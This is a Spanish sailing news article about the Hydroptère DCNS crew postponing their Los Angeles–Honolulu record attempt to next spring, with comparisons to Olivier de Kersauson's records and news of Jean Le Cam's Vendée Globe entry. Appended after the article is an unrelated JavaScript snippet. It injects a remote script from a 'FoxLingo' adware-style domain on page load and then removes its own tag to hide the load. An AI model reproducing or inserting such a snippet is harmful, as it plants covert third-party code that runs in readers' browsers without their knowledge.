HYDROPTERE DCNS baja el telón hasta la próxima primavera
Por Dury Alónso
El intento de record Los Ángeles – Hawaï se pospone, las previsiones meteorológicas no son favorables en el Pacifico. Mejorar el record de Olivier de Kersasuason, de 4 días y 19 horas. Jean Le Cam directo a la Vendée Globe.
Para Honolulu la próxima primavera. Pues este es el mensaje del director, y alma mater, Hydroptere DCNS Alain Thébault. O también aquello de: “not wind, nor race”. El equipo formado por el propio Alain Thébault, Jacques Vincent, Luc Alphand, Jean Le Cam e Yves Parlier ha estado esperando unos meses desde que llegaron a Los Angeles para intentar batir el record de travesía entre Los Ángeles y Honolulu.
Para Alain Thébault: “Obviamente estamos decepcionados. En vela, una regata, un record, comienza en el momento de su preparación. Sabíamos que iba a ser difícil, con el tiempo justo. Nuestra temporada empezó con retraso debido a cambios técnicos a bordo necesarios para adaptar el trimarán a las condiciones del océano Pacifico. Y las dificultades administrativas para desplazar el barco hasta los Estados Unidos de América… al final habremos perdido una oportunidad en el mes de julio. También tuvimos problemas en la aduana de Panamá, que fueron acumulando retrasos… El equipo técnico hizo un gran trabajo para intentar recuperar el tiempo perdido e intentar batir el record a finales del verano, pero las previsiones meteorológicas no ofrecían una “ventana” favorable. ¡Es parte del juego! Por otro lado, de cara la próxima temporada ya tenemos el barco en el lugar de salida.”
El tiempo en los Los Angeles no ha sido perdió por el equipo del Hydroptére, han estado mejorando el sistema de trimado de los foils sobre las aguas del Pacífico. En la bahía de San Francisco han establecido un nuevo record de velocidad sobre la distancia de una milla, navegando a 37,5 nudos.
Batir el record de Olivier de Kersasuason. En noviembre de 2005 el patrón francés estableció su record entre Los Angeles y Honolulu a bordo del trimarán Gerónimo, realizando un registro de 4 días y 19 horas. Kersasuaon no solo estableció este record con su multicasco de 32 metros de eslora, también en 2004 estableció un record de vuelta al mundo, Trofeo Julio Verne, en 63 días, 13 horas y 59 minutos; en julio de 2005 record vuelta a Australia en 17 días, y 13 horas; y en 2006 record Transpacific Este - Oeste (San Francisco – Yokohama) en 14 días y 22 horas, y el record Oeste – Este (Yokohama – San Francisco) en 13 días y 22 horas.
Las diferencias físicas, y técnicas, entre el trimarán Géronimo y el Hydroptére son sustanciales en eslora y desplazamiento. Géronimo mide 34 metros, tiene un desplazamiento de 24 toneladas y necesito una tripulación de 12 personas. Hydroptére tiene una eslora de 18 metros, desplaza 7 toneladas y lo manejan cinco tripulantes. Y con una salvedad importante, que el Hydroptére navega sobre el agua, a cinco metros de altura, muchos más complicado que cualquier otro multicasco.
Jean Le Cam directo a la Vendée Globe. Uno de los tripulantes principales a bordo del Hydroptére, que participa en la próxima Vendée Globe el 10 de noviembre con el OPEN 60 SynerCiel. Será su tercera participación en la vuelta al mundo en solitario, sin escalas, ni ayuda externa. En la edición de 2004-2005 finalizo en segunda posición, y en 2008-2009 se retiro por rotura de la quilla en Cabo de Hornos, donde le salvo la vida Vincent Riou con el PRB.
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();